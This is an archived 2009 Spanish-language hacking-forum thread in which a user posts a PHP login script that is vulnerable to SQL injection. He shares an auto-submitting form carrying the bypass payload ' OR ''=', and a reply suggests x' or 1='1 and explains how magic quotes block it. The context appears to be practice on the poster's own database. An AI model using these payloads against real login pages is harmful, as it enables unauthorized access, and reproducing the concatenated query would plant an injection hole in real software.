Foro de elhacker.net

Seguridad Informática => Nivel Web => Mensaje iniciado por: Banti en 7 Diciembre 2009, 17:34 pm


Título: SQLi en login...
Publicado por: Banti en 7 Diciembre 2009, 17:34 pm
Tengo un problema yo otra vez....

Código:
<?  include("../Connections/conn_ig.php"); 

echo $usuario = $HTTP_POST_VARS["usuario"];
echo $contrasena = $HTTP_POST_VARS["contrasena"];

$ssql = "SELECT * FROM usuarios WHERE nombre_usuario='$usuario' and clave_usuario='$contrasena'"; 

$rs = mysql_query($ssql,$cosa); 
$row=mysql_fetch_array($rs);

if (mysql_num_rows($rs)!=0){ 



			//usuario y contraseña válidos and tipo='admin'
			//defino una sesion y guardo datos 
			session_start(); 
			session_register("autentificado"); 
			$_SESSION["autentificado"]= "SI";  
			//panel.php tiene el panel de control
			header("Location: panel.php"); 	
}

?>
Tengo este codigo que autentifica al usuario que se conecta a la pagina... Que creo que es vulnerable a SQL Injection.

Realizo este codigo:
Código:
<body onload="document.forms[0].submit()">
<form action="http://www.pagina.com.ar/conectar.php" method="post">
<input type="text" Name="usuario" Value="admin">
<input type="text" Name="contrasena" Value="' OR ''='">
</form>
Pero no me funciona... Alguien me podria guiar?

Título: Re: SQLi en login...
Publicado por: Darioxhcx en 7 Diciembre 2009, 19:35 pm
mira esto...

http://www.webtaller.com/construccion/lenguajes/php/lessons/evitar_inyeccion_sql.php

capas te sirve.....

Título: Re: SQLi en login...
Publicado por: WHK en 7 Diciembre 2009, 19:35 pm
Intenta ponerle valores válidos en ves de nada, por ejemplo de password:
x' or 1='1
tienes la base de datos puesta verdad?
Verifica yambién que no tengas habilitado el magic quotes.

Título: Re: SQLi en login...
Publicado por: Banti en 8 Diciembre 2009, 00:18 am
Cita de: WHK en  7 Diciembre 2009, 19:35 pm
tienes la base de datos puesta verdad?
Sip, una 100% real.

Dario, lei un poco. Pero yo no veo ni una funcion malevola que me evite el SQLi.

Aun no entiendo que coños es magic quotes pero era esa cosita que te cambiba los caracteres "malvados" a uno no muy malvado no?

estuve viendo que cuando pongo el pass me lo recibe como:
Código:
x\' or 1=\'1
Es por culpa de las magic quotes?

Título: Re: SQLi en login...
Publicado por: WHK en 8 Diciembre 2009, 04:04 am
Así es, es problemas del magic quotes.

Si quieres practicar debes deshabilitarlo desde el php.ini

Título: Re: SQLi en login...
Publicado por: Banti en 8 Diciembre 2009, 05:16 am
Ah, ok Gracias otra vez!


Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines